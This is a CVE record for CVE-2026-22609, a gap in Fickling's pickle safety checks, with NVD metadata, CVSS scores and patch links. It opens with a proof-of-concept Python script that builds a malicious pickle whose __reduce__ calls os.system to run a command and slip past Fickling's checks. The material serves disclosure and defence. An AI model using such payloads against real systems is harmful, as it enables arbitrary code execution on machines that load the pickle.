CVE-2026-22609

# CVE-2026-22609 PoC - Malicious pickle exploiting unflagged modules # This pickle uses modules not flagged by Fickling's unsafe_imports() import pickle import os import base64 # Payload that uses os module (which may not be flagged) class MaliciousPayload: def __reduce__(self): # Using os.system to execute arbitrary commands cmd = "whoami > /tmp/pwned.txt" return (os.system, (cmd,)) # Create the malicious pickle malicious_data = pickle.dumps(MaliciousPayload()) # Bypass Fickling analysis print(f"Malicious pickle size: {len(malicious_data)} bytes") print("Fickling may not flag this as unsafe due to incomplete module list") # Alternative payload using subprocess (if not flagged) # import subprocess # class RCEPayload: # def __reduce__(self): # return (subprocess.check_output, (['id'],)) # Save for later use with open('malicious.pkl', 'wb') as f: f.write(malicious_data) # To execute: # pickle.load(open('malicious.pkl', 'rb'))

{"cve": {"id": "CVE-2026-22609", "sourceIdentifier": "[email protected]", "published": "2026-01-10T02:15:50.050", "lastModified": "2026-01-16T18:52:26.077", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Fickling is a Python pickling decompiler and static analyzer. Prior to version 0.1.7, the unsafe_imports() method in Fickling's static analyzer fails to flag several high-risk Python modules that can be used for arbitrary code execution. Malicious pickles importing these modules will not be detected as unsafe, allowing attackers to bypass Fickling's primary static safety checks. This issue has been patched in version 0.1.7."}, {"lang": "es", "value": "Fickling es un descompilador de pickling de Python y analizador estático. Antes de la versión 0.1.7, el método unsafe_imports() en el analizador estático de Fickling no logra marcar varios módulos de Python de alto riesgo que pueden ser utilizados para la ejecución de código arbitrario. Pickles maliciosos que importan estos módulos no serán detectados como inseguros, permitiendo a los atacantes eludir las comprobaciones de seguridad estáticas primarias de Fickling. Este problema ha sido parcheado en la versión 0.1.7."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-184"}, {"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:trailofbits:fickling:*:*:*:*:*:python:*:*", "versionEndExcluding": "0.1.7", "matchCriteriaId": "0D11EA35-A440-4468-BC69-709AA3A18DD9"}]}]}], "references": [{"url": "https://github.com/trailofbits/fickling/commit/29d5545e74b07766892c1f0461b801afccee4f91", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/trailofbits/fickling/commit/9a2b3f89bd0598b528d62c10a64c1986fcb09f66", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/trailofbits/fickling/commit/b793563e60a5e039c5837b09d7f4f6b92e6040d1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/trailofbits/fickling/commit/eb299b453342f1931c787bcb3bc33f3a03a173f9", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/trailofbits/fickling/releases/tag/v0.1.7", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-q5qq-mvfm-j35x", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-q5qq-mvfm-j35x", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}